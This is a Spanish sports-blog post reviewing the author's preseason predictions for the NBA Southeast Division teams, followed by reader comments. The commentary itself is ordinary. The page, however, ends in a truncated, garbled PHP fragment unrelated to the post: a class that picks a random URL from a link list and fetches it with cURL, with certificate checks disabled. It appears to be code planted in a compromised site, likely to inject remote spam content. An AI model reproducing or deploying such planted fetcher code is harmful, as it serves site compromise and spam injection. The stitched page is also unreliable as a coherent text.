Revisando pronósticos 2011: Southeast

31 de January de 2011 por TheDeerHunter

threebeachMIAMI HEAT

Pronóstico Septiembre 2010: Campeones.
Probabilidad de acierto:
Media.
Calificación pronóstico:
C
Análisis

No nos mojamos demasiado con nuestro análisis. El pronóstico, más que una apuesta por sus posibilidades, es una exigencia latente. No les vale otra cosa. Más allá de eso no hicimos demasiadas valoraciones y nos situamos a la expectativa de cómo iba a funcionar este proyecto y cómo iban a soportar la presión.

Podemos decir que los primeros exámenes parciales los han aprobado con nota, tras un momento crítico en el que parecía que todo podía saltar por los aires y que la cabeza de Spoelstra estaba en el punto de mira. Las bajas de sus dos mejores hombres de rotación, Miller y Haslem, la adaptación de los nuevos y la propia dificultad de empezar a andar con un equipo completamente nuevo crearon un ambiente casi irrespirable.

Sin embargo, la grandeza de sus estrellas también se mide en este tipo de detalles. En el momento más difícil ellos son capaces de responder. Jugadores de menor jerarquía se habrían hundido en el lodo a las primeras de cambio. Ellos reaccionaron con la grandeza que se les presupone y llegaron a alcanzar cotas muy altas de juego y resultados en un tiempo récord. Su cima fue el palizón que les infligieron a los Lakers en el Staples y el liderato puntual de la conferencia Este. Se hablaba incluso del MVP conjunto para LeBron y Wade. Ambos podrían optar a él individualmente.

La primera dificultad les hizo más fuertes. Ahora llega el segundo bache, con las lesiones de Bosh, Wade y/o LeBron, y es donde se observan las carencias evidentes de una plantilla tan cogida por hilos. Veremos cómo salen de ésta.

Sea como sea, la temporada regular despejará pocas dudas. Partimos de la base de que debe de ocurrir alguna tragedia para que no aseguren postemporada pronto. Su objetivo debería ser llegar bien físicamente al momento decisivo, más que llegar bien colocados. Se antoja que están un peldaño por debajo de Boston pero igual o por encima de todos los demás y que pueden ir mejorando. Sin embargo, nadie sabe cómo adaptarán su juego al ritmo quedo de los cruces. Sólo lo sabremos cuando llegue el momento.

richarenashowardORLANDO MAGIC

Pronóstico Septiembre 2010: Semifinales de Conferencia.
Probabilidad de acierto:
Media-Alta.
Calificación pronóstico: C+
Análisis

La tiranía impuesta por Boston y Miami, más el empuje de Chicago, Atlanta o incluso Nueva York, ha llevado a Orlando a moverse con decisión para mantener su estatus de candidatos. Lo bueno es que se han desprendido de elementos cuyo rendimiento no les estaba llevando a ningún lado y han abierto el camino a otros muy válidos que no contaban. Lo malo es que muchos esperaban una apuesta más decisiva y que las incorporaciones no han terminado de dar la consistencia buscada.

Uno se atrevería a afirmar que tienen más posibilidades ahora que antes, que para lo que estaban haciendo Lewis, Carter o Pietrus (lo que le dejaban hacer), están mucho mejor hoy con Bass, Anderson, Richardson y el Turco (jugando bien). No terminan de cuadrar Redick y Arenas pero son bien capaces de armarla en cualquier momento, además de tener todavía margen para adaptarse.

Seguimos pensando que aun con los cambios (o precisamente por ellos), son la plantilla más profunda y compensada de todas y su comportamiento colectivo a menudo nos deslumbra… pero ¿quién seguiría estando dispuesto a apostar por Van Gundy en una partida de ajedrez contra Doc Rivers?

A este equipo las semifinales no le valdría de nada.

Horford Smith JohnsonATLANTA HAWKS

Pronóstico Septiembre 2010: 50 victorias. Semifinales de Conferencia.
Probabilidad de acierto
: Media.
Calificación pronóstico
: B-
Análisis

Hay pocos equipos a los que conocemos tanto como a los Hawks. Todos nos sabemos su alineación de memoria, cada partido igual y sin cambios desde hace tiempo. Su juego ya lo conocemos bien y puede sorprender a muy pocos.

Sin cambios, estaban destinados a ser lo de siempre: cuartos de Conferencia y al hoyo en cualquier cruce frente a los tres primeros. Pero ojo… sí ha habido cambios, aunque hayan sido ajenos. Uno se llama Miami Heat, otro se llama Chicago Bulls… y el más reciente se llama Orlando Magic. Y ellos, atados de pies y manos por aspectos financieros. Quedar cuarto ahora mismo sería un muy buen resultado y caer a la quinta plaza es casi una sentencia de muerte en primera ronda en esta conferencia… por mucho que alcancen las 50 victorias.

Hay una baza posible, que ya adelantamos en su día. El expiring de Jamal Crawford. Sin embargo no se aprecia ni la más mínima intención de la franquicia en mover a un jugador que está resultando vital ahora mismo. ¿Por quién deberían cambiarlo llegado el caso? Tampoco está muy clara esa cuestión.

Los Hawks están jugando razonablemente bien, clavando expectativas, como se podía esperar. Sin embargo, tenemos grandes dudas de que con sus clásicos mimbres sean capaces de mantener su peso específico en la Conferencia. Son un rival terriblemente duro para una primera ronda pero les resultará difícil pasar de ahí.

BobcatsCHARLOTTE BOBCATS

Pronóstico Septiembre 2010: 35-38 victorias. Luchando por 2 últimas plazas de Playoffs.
Probabilidad de acierto
: Alta.
Calificación pronóstico
: A+
Análisis

Es complicado estar más acertados. Afinar tanto en una zona tan convulsa como es la cola de postemporada en el Este, en un equipo tan marcado por la caraja mental de Mr. Jordan.

Quién lo iba a decir… la temporada empezó bastante mal, cada día era una odisea para sumar algo más de 80 puntos. Sin Wallace ni Jackson al nivel del año pasado y con el mismo corsé de Mike Brown tenían que ser titanes defensivos para rascar algo. Demasiado pedir para un equipo que tiene a Mohammed y Kwane de centers.

Pero Jordan sacó la guadaña y metió a Silas en el banquillo. En el contexto del Este cualquiera está a tiempo de reaccionar y el equipo tiene otra cara. Augustin, Diaw e incluso Kwane Brown parecen otros. Silas está combinando la buena defensa de su predecesor con algo más de vidilla delante y les está funcionando. Las 35 victorias no sólo son posibles sino que son probables y una de las últimas plazas de Playoffs está en sus manos. Un crack, nuestro analista.

john wallWASHINGTON WIZARDS

Pronóstico Septiembre 2010: Fuera de playoffs.
Probabilidad de acierto
: Alta.
Calificación pronóstico
: A
Análisis

Como ya avanzaba nuestro análisis, “la intersección de dos eras” duró poco. La idea no era quitarse de pobres o de ricos, sino cerrar una etapa fatídica para la franquicia, por mucho que deportivamente Arenas estaba rindiendo razonablemente bien junto a Wall y no estaba dando demasiados dolores de cabeza con sus cosas.

El futuro, puesto en manos de “Wonder” Wall, Nick Young, Blatche o McGee, se toma con escepticismo pero con esperanza, porque es difícil caer más bajo ni perder tanto el tiempo como se ha hecho estos años.

Uno de los pequeños objetivos que tenían marcado este año, el RoY del flamante nº1 del draft, no va a poder ser, porque el obstáculo Griffin es insalvable. Pero el joven base está cumpliendo bien. Si corrige ciertos defectos va a darles muchas alegrías. Hay pocos tan completos.

Suponemos que en poco tiempo el equipo se dedicará alegremente a amasar derrotas para posicionarse de cara al futuro. Cualquier análisis dejará de ser válido. La reconstrucción ha comenzado, pero al menos ya van en una dirección clara.

Comenta

7 comentarios a esta entrada

  1. Txusma dice:
    #1

    Ei, Deer? Que hay de tu admiracion por Yi Jianlian? 😀 (puñalada trapera por la espalda)

      Citar

  2. TheDeerHunter dice:
    #2

    Cómo venís hoy, madre mía.
    Admiración no… tenía fe.
    Y ayer hizo un 14-10 con 4 robos y un tapón. Así que es mal momento para vacilarme.

    Diría que ese podría ser su nivel, pero el problema es que el minutaje parece una montaña rusa.

      Citar

  3. Hynreck dice:
    #3

    Txusma poco a poco se vengará de todos nosotros por tomarle el pelo con los Spanoulis, Samardos y Yaos.
    Lo tiene todo apuntado!!

      Citar

  4. Txusma dice:
    #4

    Pero que manía con Samardo. No está mal jugársela con un undrafted y resultar que luego firma un contrato con un equipo de la NBA (para llevar las toallas, vale). Hay algunas 2ª rondas que no pueden decir lo mismo.

    Y tampoco quería hacer sangre con Jianlian pero recordaba que tenías fuertes esperanzas en él y más después del buen mundial que hizo. Ahora puede que gane minutos pq McGee se ha ido al banco y Blatche ha pasado a jugar de 5. Aunque de momento el titular es el rookie Trevor Booker.

      Citar

  5. Hynreck dice:
    #5

    Si de Samardo lo que mola es el nombre, por eso llama la atención. Si no nadie se habría fijado en él. Sería como cualquier tercera ronda que elegimos de esas de las que no sale nada.
    Hay nombres que se te quedan grabados. A mí por ejemplo siempre me moló Cornelius McFadgon, más conocido como scooter, para mí es un nombre más que pintoresco.
    http://www.nba.com/playerfile/scooter_mcfadgon/
    http://vegassummerleague.nba.com/players_info.cfm?player=384&season=3&team=32

      Citar

  6. TheDeerHunter dice:
    #6

    No… Txusma no quería hacer sangre con Jianlian… XD

    No sigo con atención los Wizards y tampoco controlo su día a día… pero un cuarto de hora de promedio me parece excesivamente poco. Si me dijeras que McGee o Blatche se están saliendo. Desde luego el rookie no ha justificado que deba estar por delante.

    En cualquier caso está siendo una temporada muy mala para él.

      Citar

  7. Denise dice:
    #7

    Si los Magic no han ganado la NBA en las ultimas 2 temporadas donde tenian el mejor equipo de la NBA, no lo harán este año.
    Y en cuanto al ganador de división, está ventilado, la ganarán los Heat.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>